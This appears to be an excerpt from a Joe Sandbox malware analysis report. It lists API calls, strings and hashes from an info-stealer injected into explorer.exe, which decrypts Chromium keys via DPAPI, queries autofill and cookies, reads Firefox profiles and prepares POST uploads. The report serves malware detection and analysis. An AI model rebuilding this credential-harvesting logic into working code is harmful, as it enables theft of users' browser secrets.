FindClose.KERNELBASE(00000000), ref: 00E01EA3

Part of subcall function 00E01953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,00E02F0C), ref: 00E01973
Part of subcall function 00E01953: lstrlenW.KERNEL32(00E56564,?,?,00E02F0C), ref: 00E01978
Part of subcall function 00E01953: lstrcatW.KERNEL32(00000000,?,?,?,00E02F0C), ref: 00E01990
Part of subcall function 00E01953: lstrcatW.KERNEL32(00000000,00E56564,?,?,00E02F0C), ref: 00E01994

Strings

\*.*, xrefs: 00E01D79
*.*, xrefs: 00E01D8B

Memory Dump Source

Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e01000_explorer.jbxd

Similarity

API ID: lstrlen$Findlstrcmpi$Filelstrcat$CloseComputeCrc32FirstNext
String ID: *.*$\*.*
API String ID: 232625764-1692270452
Opcode ID: 0741f9eb837e5c274ec876aa900853048c48e4850fd87095ae18a8ef3ed64b65
Instruction ID: 0f3e459cb9bb3adc064a69591a0b51a37c48651b67b0fb4e97d0e9c5ce2c99a0
Opcode Fuzzy Hash: 0741f9eb837e5c274ec876aa900853048c48e4850fd87095ae18a8ef3ed64b65
Instruction Fuzzy Hash: 4031B9303043415BCB24AB74C898A6F76E9AFC4345F406969FD4ABB2D1EB75CC8A8752

Function 00E03E04 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 75
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00E01B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,00E02893,00000000,00000000,00000000,?), ref: 00E01B82
Part of subcall function 00E01B6A: CloseHandle.KERNELBASE(00000000), ref: 00E01B8F

Part of subcall function 00E01C31: CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000000,00000000,00000000,00E03E1E,00000000,?,00E03FA8), ref: 00E01C46
Part of subcall function 00E01C31: GetFileSize.KERNEL32(00000000,00000000,00000000,?,00E03FA8), ref: 00E01C56
Part of subcall function 00E01C31: ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,00E03FA8), ref: 00E01C76
Part of subcall function 00E01C31: CloseHandle.KERNEL32(00000000,?,00E03FA8), ref: 00E01C91

Part of subcall function 00E02FB1: StrStrIA.KERNELBASE(00000000,"encrypted_key":",00000000,00000000,00000000,00E03E30,00000000,00000000,?,00E03FA8), ref: 00E02FC1
Part of subcall function 00E02FB1: lstrlen.KERNEL32("encrypted_key":",?,00E03FA8), ref: 00E02FCE
Part of subcall function 00E02FB1: StrStrIA.SHLWAPI("encrypted_key":",00E5692C,?,00E03FA8), ref: 00E02FDD

Part of subcall function 00E0123B: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00E03E4B,00000000), ref: 00E0124A
Part of subcall function 00E0123B: CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00E01268
Part of subcall function 00E0123B: CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00E01295

RtlCompareMemory.NTDLL(00000000,IDPAP,00000005), ref: 00E03E74
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00E03E9E

Strings

, xrefs: 00E03EA8
DPAP, xrefs: 00E03E52
IDPAP, xrefs: 00E03E6E, 00E03E72
DPAP, xrefs: 00E03E5A

Memory Dump Source

Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e01000_explorer.jbxd

Similarity

API ID: File$Crypt$BinaryCloseCreateHandleStringlstrlen$CompareDataMemoryReadSizeUnprotect
String ID: $DPAP$DPAP$IDPAP
API String ID: 3076719866-957854035
Opcode ID: c9043e2471e48d216c57ae2d2b0655f0741ec5dbc8385e533871afc1c2b50d6e
Instruction ID: c9f18f94d8410dde2daebd32d22ae51e5f4445074e7bf4c16798bbf7265f42b3
Opcode Fuzzy Hash: c9043e2471e48d216c57ae2d2b0655f0741ec5dbc8385e533871afc1c2b50d6e
Instruction Fuzzy Hash: 2B21D4326043455BD711EA74CC80A7FB2DCAF84704F441A6EF940E7281EB74CE8A8792

Function 00E04B92 Relevance: 3.0, APIs: 2, Instructions: 26nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 00E01162: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00E0116F

RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 00E04BB6
NtUnmapViewOfSection.NTDLL(000000FF), ref: 00E04BBF

Memory Dump Source

Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e01000_explorer.jbxd

Similarity

API ID: MemoryMoveQuerySectionUnmapViewVirtual
String ID:
API String ID: 1675517319-0
Opcode ID: 2cb8a80f2d07fdb545cf57b59fa2c1ce11dc33f5a4c6b3478f44339c56a547d4
Instruction ID: 626d1cc3526c61e0190d8db04b9ca08ea3b8423238fa977c99317638cfb4f905
Opcode Fuzzy Hash: 2cb8a80f2d07fdb545cf57b59fa2c1ce11dc33f5a4c6b3478f44339c56a547d4
Instruction Fuzzy Hash: 06E0D8B15013106BC6587B71BD0DB4B3BD89F913A1F10D998F355B60D1CA31CCC48A50

Function 00E06512 Relevance: 1.5, APIs: 1, Instructions: 34COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNELBASE(00E620A4,00000001,00000000,0000000A,00E53127,00E028DA,00000000,?), ref: 00E0BFFC

Memory Dump Source

Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e01000_explorer.jbxd

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: 7e75b792f716d75c72ea66e3272f0e2b6737ac25315a93e67fa1b0c50115cd7c
Instruction ID: d2db02693f5c88a4434a0acb79c4cbb39010292c3a89b1511e410759252fda39
Opcode Fuzzy Hash: 7e75b792f716d75c72ea66e3272f0e2b6737ac25315a93e67fa1b0c50115cd7c
Instruction Fuzzy Hash: 33E0E5317C430035E62536B97C07F5A15A58F81B81F64BA55BB10F91CADB9581E02026

Function 00E03C40 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 147
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00E01B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,00E02893,00000000,00000000,00000000,?), ref: 00E01B82
Part of subcall function 00E01B6A: CloseHandle.KERNELBASE(00000000), ref: 00E01B8F

Part of subcall function 00E01000: GetProcessHeap.KERNEL32(00000008,?,00E011C7,?,?,00000001,00000000,?), ref: 00E01003
Part of subcall function 00E01000: RtlAllocateHeap.NTDLL(00000000), ref: 00E0100A

GetTempPathW.KERNEL32(00000104,00000000), ref: 00E03C6A
GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 00E03C76
DeleteFileW.KERNELBASE(00000000), ref: 00E03C7D
CopyFileW.KERNELBASE(?,00000000,00000000), ref: 00E03C89
lstrlen.KERNEL32(00000000,?,?,?,?,00000000,00000000,?), ref: 00E03D2F
lstrlen.KERNEL32(00000000), ref: 00E03D36
wsprintfA.USER32 ref: 00E03D55
lstrlen.KERNEL32(00000000), ref: 00E03D61
lstrcat.KERNEL32(00000000,?), ref: 00E03D89
lstrlen.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 00E03DB2
DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 00E03DED

Strings

%s = %s, xrefs: 00E03D4F
SELECT name,value FROM autofill, xrefs: 00E03CAA
AUTOFILL, xrefs: 00E03DBD, 00E03DC2, 00E03DCC

Memory Dump Source

Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e01000_explorer.jbxd

Similarity

API ID: File$lstrlen$DeleteHeapTemp$AllocateCloseCopyCreateHandleNamePathProcesslstrcatwsprintf
String ID: %s = %s$AUTOFILL$SELECT name,value FROM autofill
API String ID: 2923052733-3488123210
Opcode ID: e172b68634998a7bb554417dd06f3a9df3906aa1e6114af026c9998f717e0c1e
Instruction ID: f4b9bff1ca902aae0378fd5be93eed28de45b1daeb44fca9ef1874e90d279f2d
Opcode Fuzzy Hash: e172b68634998a7bb554417dd06f3a9df3906aa1e6114af026c9998f717e0c1e
Instruction Fuzzy Hash: 7341BF30204301AFD725AB718C81E3F7AEEAF85759F40286DF885B72D2DA35DD858762

Function 00E028F8 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 158
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 00E02AD2

Part of subcall function 00E01000: GetProcessHeap.KERNEL32(00000008,?,00E011C7,?,?,00000001,00000000,?), ref: 00E01003
Part of subcall function 00E01000: RtlAllocateHeap.NTDLL(00000000), ref: 00E0100A

lstrlen.KERNEL32(00000000,?,?,?,?,?,?), ref: 00E029E1
lstrlen.KERNEL32(00000000), ref: 00E029EC
wsprintfA.USER32 ref: 00E02A38
lstrlen.KERNEL32(00000000), ref: 00E02A44
lstrcat.KERNEL32(00000000,00000000), ref: 00E02A6C
lstrlen.KERNEL32(00000000,?,?), ref: 00E02A99

Strings

%sTRUE%s%s%s%s%s, xrefs: 00E02A32
COOKIES, xrefs: 00E02AA4, 00E02AAB, 00E02AB1
FALSE, xrefs: 00E02A06
TRUE, xrefs: 00E02A13

Memory Dump Source

Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e01000_explorer.jbxd

Similarity

API ID: lstrlen$Heap$AllocateDeleteFileProcesslstrcatwsprintf
String ID: %sTRUE%s%s%s%s%s$COOKIES$FALSE$TRUE
API String ID: 304071051-2605711689
Opcode ID: 86ebbc8ba13f0667fc690d63ec288a988fc9ad2e773f8522ba90ace9322daeb9
Instruction ID: 0201c217add21aa4d62fe13b48457704d423d28693543c0178d9facf932eb3e2
Opcode Fuzzy Hash: 86ebbc8ba13f0667fc690d63ec288a988fc9ad2e773f8522ba90ace9322daeb9
Instruction Fuzzy Hash: 4351DF307043478BC729EF218854A3F76EAAFC5309F44286DF985BB292DB35DC898752

Function 00E02CB5 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 112
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00E01953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,00E02F0C), ref: 00E01973
Part of subcall function 00E01953: lstrlenW.KERNEL32(00E56564,?,?,00E02F0C), ref: 00E01978
Part of subcall function 00E01953: lstrcatW.KERNEL32(00000000,?,?,?,00E02F0C), ref: 00E01990
Part of subcall function 00E01953: lstrcatW.KERNEL32(00000000,00E56564,?,?,00E02F0C), ref: 00E01994

Part of subcall function 00E01000: GetProcessHeap.KERNEL32(00000008,?,00E011C7,?,?,00000001,00000000,?), ref: 00E01003
Part of subcall function 00E01000: RtlAllocateHeap.NTDLL(00000000), ref: 00E0100A

Part of subcall function 00E01B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,00E02893,00000000,00000000,00000000,?), ref: 00E01B82
Part of subcall function 00E01B6A: CloseHandle.KERNELBASE(00000000), ref: 00E01B8F

GetPrivateProfileSectionNamesW.KERNEL32(00000000,0000FDE8,00000000), ref: 00E02D13
StrStrIW.SHLWAPI(00000000,Profile), ref: 00E02D45
GetPrivateProfileStringW.KERNEL32(00000000,Path,00E5637C,?,00000FFF,?), ref: 00E02D68
GetPrivateProfileIntW.KERNEL32(00000000,IsRelative,00000001,?), ref: 00E02D7B
lstrlenW.KERNEL32(00000000), ref: 00E02DD8

Strings

Path, xrefs: 00E02D62
IsRelative, xrefs: 00E02D75
profiles.ini, xrefs: 00E02CCD
Profile, xrefs: 00E02D3F

Memory Dump Source

Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e01000_explorer.jbxd

Similarity

API ID: PrivateProfilelstrlen$Heaplstrcat$AllocateCloseCreateFileHandleNamesProcessSectionString
String ID: IsRelative$Path$Profile$profiles.ini
API String ID: 2234428054-4107377610
Opcode ID: 59300010414c04248966fc185236f6b6ef8f9f6b21611d343b62323343cd25ea
Instruction ID: cb88c7a5a34958a241fd2f7811999093cf8ba962775fe9d6a31163269066e2f1
Opcode Fuzzy Hash: 59300010414c04248966fc185236f6b6ef8f9f6b21611d343b62323343cd25ea
Instruction Fuzzy Hash: A131AD307043029BCB24AB31881563FB6E2AFC4304F50686DFA46BB2D2DF758CCA9752

Function 00E01333 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 226
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00E01000: GetProcessHeap.KERNEL32(00000008,?,00E011C7,?,?,00000001,00000000,?), ref: 00E01003
Part of subcall function 00E01000: RtlAllocateHeap.NTDLL(00000000), ref: 00E0100A

Part of subcall function 00E0106C: lstrlen.KERNEL32(035270FE,00000000,00000000,00000000,00E01366,74DE8A60,035270FE,00000000), ref: 00E01074
Part of subcall function 00E0106C: MultiByteToWideChar.KERNEL32(00000000,00000000,035270FE,00000001,00000000,00000000), ref: 00E01086

Part of subcall function 00E012A3: RtlZeroMemory.NTDLL(?,00000018), ref: 00E012B5

RtlZeroMemory.NTDLL(?,0000003C), ref: 00E013C2
wsprintfW.USER32 ref: 00E014B5
RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 00E01594

Strings

Accept: */*Referer: %S, xrefs: 00E014AF
Content-Type: application/x-www-form-urlencoded, xrefs: 00E014FB
POST, xrefs: 00E01465

Memory Dump Source

Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e01000_explorer.jbxd

Similarity

API ID: Memory$HeapZero$AllocateByteCharMoveMultiProcessWidelstrlenwsprintf
String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$POST
API String ID: 3833683434-704803497
Opcode ID: 9eb840fd6159bebc5694407e7942faa40c729beb6cdedec635aeecf7d487f037
Instruction ID: 54600d603a79abfa99f12cc47f47253147117e360b2bbc51b7c40cfb030d4c87
Opcode Fuzzy Hash: 9eb840fd6159bebc5694407e7942faa40c729beb6cdedec635aeecf7d487f037
Instruction Fuzzy Hash: 30719A70608301AFD7149F65DC84A2BBBE9FF88345F40196DF995EB2A1DB70CD888B52

Function 00E0A40E Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 116
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memcpy.NTDLL(?,?,?), ref: 00E0A455
memcpy.NTDLL(?,?,?), ref: 00E0A479
ReadFile.KERNELBASE(?,?,?,?,?), ref: 00E0A4DB
memset.NTDLL ref: 00E0A546

Strings

S, xrefs: 00E0A4DB
winRead, xrefs: 00E0A515

Memory Dump Source

Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e01000_explorer.jbxd

Similarity

API ID: memcpy$FileReadmemset
String ID: winRead$S
API String ID: 2051157613-1961733145
Opcode ID: 79e53559f4e5d7ac17312a5b78cca163784c03fe2b95b6f40a4a73e72a279aac
Instruction ID: 530ea7d673a3e03917d679920926ef87d35c0caedde75c0bdc7182794a1f444e
Opcode Fuzzy Hash: 79e53559f4e5d7ac17312a5b78cca163784c03fe2b95b6f40a4a73e72a279aac
Instruction Fuzzy Hash: 8131A076205309AFC740DE68CC8599F77E6EFC4354F886928F895A7291E670EC448B53

Function 00E0A67C Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 78
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_alldiv.NTDLL(?,?,?), ref: 00E0A6AD
_allmul.NTDLL(00000000,?,?), ref: 00E0A6B6
SetEndOfFile.KERNELBASE(?), ref: 00E0A6F3

Strings

winTruncate1, xrefs: 00E0A6DF
winTruncate2, xrefs: 00E0A717
@T, xrefs: 00E0A6F3

Memory Dump Source

Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e01000_explorer.jbxd

Similarity

API ID: File_alldiv_allmul
String ID: @T$winTruncate1$winTruncate2
API String ID: 3568847005-4058645489
Opcode ID: 98867eec5ee0307661dfc29d6efaa79494742ed7e8b7d86bfc60512a799dd251
Instruction ID: 76b4412521d06fc729ef7578ceead9dec85cb8b5fdee8769dd57a5b2e9af4664
Opcode Fuzzy Hash: 98867eec5ee0307661dfc29d6efaa79494742ed7e8b7d86bfc60512a799dd251
Instruction Fuzzy Hash: 8F21C172201304ABCB148E29CC85EA777A9EF84355F1DA169FD14EB286D635DC90CB62

Function 00E0B87B Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 202
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.NTDLL ref: 00E0B8D5
CreateFileW.KERNELBASE(00000000,?,00000003,00000000,-00000003,?,00000000), ref: 00E0B96F

Strings

winOpen, xrefs: 00E0BA22
psow, xrefs: 00E0BA95
S, xrefs: 00E0B96F

Memory Dump Source

Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e01000_explorer.jbxd

Similarity

API ID: CreateFilememset
String ID: psow$winOpen$S
API String ID: 2416746761-4294840145
Opcode ID: 58ebb914d1ffda1006d4d1797bff4d09f5351fc78f9a95083ffffbde3d0537d7
Instruction ID: 80caec550ffb449317fa09e2c9c477a5a52d5dc9914eb87375c9dd8ef3a77848
Opcode Fuzzy Hash: 58ebb914d1ffda1006d4d1797bff4d09f5351fc78f9a95083ffffbde3d0537d7
Instruction Fuzzy Hash: 9E718B71A04702AFC710DF29C981B5ABBE0FF88324F145A29F964B72D1D774D994CBA2

Function 00E0B1E5 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 174
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileMappingW.KERNELBASE(?,00000000,00000004,00000000,00000006,00000000,?,?,00000000), ref: 00E0B31D
MapViewOfFile.KERNELBASE(?,?,00000000,?,?), ref: 00E0B34F

Strings

winShmMap1, xrefs: 00E0B278
winShmMap3, xrefs: 00E0B399
winShmMap2, xrefs: 00E0B2CF

Memory Dump Source

Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e01000_explorer.jbxd

Similarity

API ID: File$CreateMappingView
String ID: winShmMap1$winShmMap2$winShmMap3
API String ID: 3452162329-3826999013
Opcode ID: 65d5babb269a38723c6c5efaaedaf24f5a7005c91e373a7f1cefc8d7fd789d5c
Instruction ID: 63eb61329243d93cb13c30154d703311cb314aa47a41694c33eec0e461678de9
Opcode Fuzzy Hash: 65d5babb269a38723c6c5efaaedaf24f5a7005c91e373a7f1cefc8d7fd789d5c
Instruction Fuzzy Hash: 7751C171204701DFDB25CF18C841A6B77E5FF94348F24982EE982AB2D1DBB4E889CB51

Function 00E02E30 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 113registryCOMMON

Download Yara Rule

APIs

StrStrIW.KERNELBASE(?,?), ref: 00E02E4B
RegOpenKeyExW.KERNELBASE(?,?,00000000,00020119,?), ref: 00E02EE4
RegEnumKeyExW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00E02F54
RegCloseKey.KERNELBASE(?), ref: 00E02F62

Part of subcall function 00E019E5: RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00E01AE2,PortNumber,00000000,00000000), ref: 00E01A1E
Part of subcall function 00E019E5: RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00E01A3C
Part of subcall function 00E019E5: RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00E01A75
Part of subcall function 00E019E5: RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00E01AE2,PortNumber,00000000,00000000), ref: 00E01A98

Part of subcall function 00E01BC5: lstrlenW.KERNEL32(00000000,00000000,?,00E02E75,PathToExe,00000000,00000000), ref: 00E01BCC
Part of subcall function 00E01BC5: StrStrIW.SHLWAPI(00000000,.exe,?,00E02E75,PathToExe,00000000,00000000), ref: 00E01BF0
Part of subcall function 00E01BC5: StrRChrIW.SHLWAPI(00000000,00000000,0000005C,?,00E02E75,PathToExe,00000000,00000000), ref: 00E01C05
Part of subcall function 00E01BC5: lstrlenW.KERNEL32(00000000,?,00E02E75,PathToExe,00000000,00000000), ref: 00E01C1C

Part of subcall function 00E01AFE: SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,00000000,00000000,?,?,00E02E83,PathToExe,00000000,00000000), ref: 00E01B16

Strings

PathToExe, xrefs: 00E02E5E

Memory Dump Source

Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e01000_explorer.jbxd

Similarity

API ID: CloseOpenQueryValuelstrlen$EnumFolderPath
String ID: PathToExe
API String ID: 1799103994-1982016430
Opcode ID: 356f6fc51fee46c4b0945bbd4a5801d406d6965ae545dd41e5a063b8dfbd8a45
Instruction ID: 929e39d5df77cacaffa4c47761a229ab6fddb599ea22bdfa84c3ebbdfa20ebca
Opcode Fuzzy Hash: 356f6fc51fee46c4b0945bbd4a5801d406d6965ae545dd41e5a063b8dfbd8a45
Instruction Fuzzy Hash: 6F318F316043116FCB16AF21CC1986F7AEAEFC4350B04951DF955AB2C0DA34C986CBA1

Function 00E04A71 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 52registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00E01000: GetProcessHeap.KERNEL32(00000008,?,00E011C7,?,?,00000001,00000000,?), ref: 00E01003
Part of subcall function 00E01000: RtlAllocateHeap.NTDLL(00000000), ref: 00E0100A

wsprintfW.USER32 ref: 00E04AA2
RegCreateKeyExW.KERNELBASE(80000001,00000000,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 00E04AC7
RegCloseKey.KERNELBASE(?), ref: 00E04AD4

Strings

Software, xrefs: 00E04A95
%s\%08x, xrefs: 00E04A9C

Memory Dump Source

Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e01000_explorer.jbxd

Similarity

API ID: Heap$AllocateCloseCreateProcesswsprintf
String ID: %s\%08x$Software
API String ID: 1800864259-1658101971
Opcode ID: 274cc68d5831e4eeef2dce4c45c2148fc2f3f62d063954d4f37da003a5e8cc87
Instruction ID: 1d4a32f4ab85565d4d82f4faa0344063f494af057bf65721984f637b1bd84926
Opcode Fuzzy Hash: 274cc68d5831e4eeef2dce4c45c2148fc2f3f62d063954d4f37da003a5e8cc87
Instruction Fuzzy Hash: A501D4B1600208BFDB189F95DC4ADBF77BDEB40355B8001AEFA05B3180EAB05D849660

Function 00E04317 Relevance: 7.6, APIs: 5, Instructions: 64registryCOMMON

Download Yara Rule

APIs

_alloca_probe.NTDLL ref: 00E0431C
RegOpenKeyW.ADVAPI32(80000001,?,?), ref: 00E04335
RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00E04363
RegCloseKey.ADVAPI32(?), ref: 00E043C8

Part of subcall function 00E01953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,00E02F0C), ref: 00E01973
Part of subcall function 00E01953: lstrlenW.KERNEL32(00E56564,?,?,00E02F0C), ref: 00E01978
Part of subcall function 00E01953: lstrcatW.KERNEL32(00000000,?,?,?,00E02F0C), ref: 00E01990
Part of subcall function 00E01953: lstrcatW.KERNEL32(00000000,00E56564,?,?,00E02F0C), ref: 00E01994

Part of subcall function 00E0418A: wsprintfW.USER32 ref: 00E04212

Part of subcall function 00E01011: GetProcessHeap.KERNEL32(00000000,00000000,?,00E01A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00E01AE2), ref: 00E01020
Part of subcall function 00E01011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00E01AE2,PortNumber,00000000,00000000), ref: 00E01027

RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00E043B9

Memory Dump Source

Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e01000_explorer.jbxd

Similarity

API ID: EnumHeaplstrcatlstrlen$CloseFreeOpenProcess_alloca_probewsprintf
String ID:
API String ID: 801677237-0
Opcode ID: 4d4a18fb5eb5a068daacd2c42f966856838782eb3774f40d6f45abed6de5d0bb
Instruction ID: 60225f3939014498409ef0ebc526a6592b3459e482db8c465280ff8d2b38ea10
Opcode Fuzzy Hash: 4d4a18fb5eb5a068daacd2c42f966856838782eb3774f40d6f45abed6de5d0bb
Instruction Fuzzy Hash: 721182F1104201BFE7159B10CC45DBF77EDEB88344F005A2EF989E2190EB749D889B62

Function 00E69247 Relevance: 6.3, APIs: 4, Instructions: 343COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2907845320.0000000000E67000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E67000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e67000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f28febb4cba77866872504b8491459f0bad4dc7c298fea65022eba6a091dc25
Instruction ID: 524adb3d9437a46b33a2dc38ca1d9e2c322c3661dd364165dd90e7eb9e1686bf
Opcode Fuzzy Hash: 9f28febb4cba77866872504b8491459f0bad4dc7c298fea65022eba6a091dc25
Instruction Fuzzy Hash: 4CA14B729943525BD7218F78ECC06E07BA9EB523A4B2C166DC5E1EB2C3EB705807C761

Function 00E019E5 Relevance: 6.1, APIs: 4, Instructions: 89registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00E01AE2,PortNumber,00000000,00000000), ref: 00E01A1E
RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00E01A3C
RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00E01A75
RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00E01AE2,PortNumber,00000000,00000000), ref: 00E01A98

Part of subcall function 00E01011: GetProcessHeap.KERNEL32(00000000,00000000,?,00E01A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00E01AE2), ref: 00E01020
Part of subcall function 00E01011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00E01AE2,PortNumber,00000000,00000000), ref: 00E01027

Memory Dump Source

Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e01000_explorer.jbxd

Similarity

API ID: HeapQueryValue$CloseFreeOpenProcess
String ID:
API String ID: 217796345-0
Opcode ID: f7963104c10c61d4a273249f509b38ddd43b983c5af77b83f3d58127ae77eb39
Instruction ID: 13caa5e70bc46af68aadb26fce6575eb32e7213878576b26d9ef140439f1e731
Opcode Fuzzy Hash: f7963104c10c61d4a273249f509b38ddd43b983c5af77b83f3d58127ae77eb39
Instruction Fuzzy Hash: 3521D3723063416FEB288B21CD44F7BB7F9EBC8759F000A6DF985BA180E630CD858621

Function 00E01EC1 Relevance: 6.1, APIs: 4, Instructions: 82registryCOMMON

Download Yara Rule

APIs

RegOpenKeyW.ADVAPI32(?,?,?), ref: 00E01ED5

Part of subcall function 00E01000: GetProcessHeap.KERNEL32(00000008,?,00E011C7,?,?,00000001,00000000,?), ref: 00E01003
Part of subcall function 00E01000: RtlAllocateHeap.NTDLL(00000000), ref: 00E0100A

RegEnumKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00E01F0C
RegCloseKey.ADVAPI32(?), ref: 00E01F98

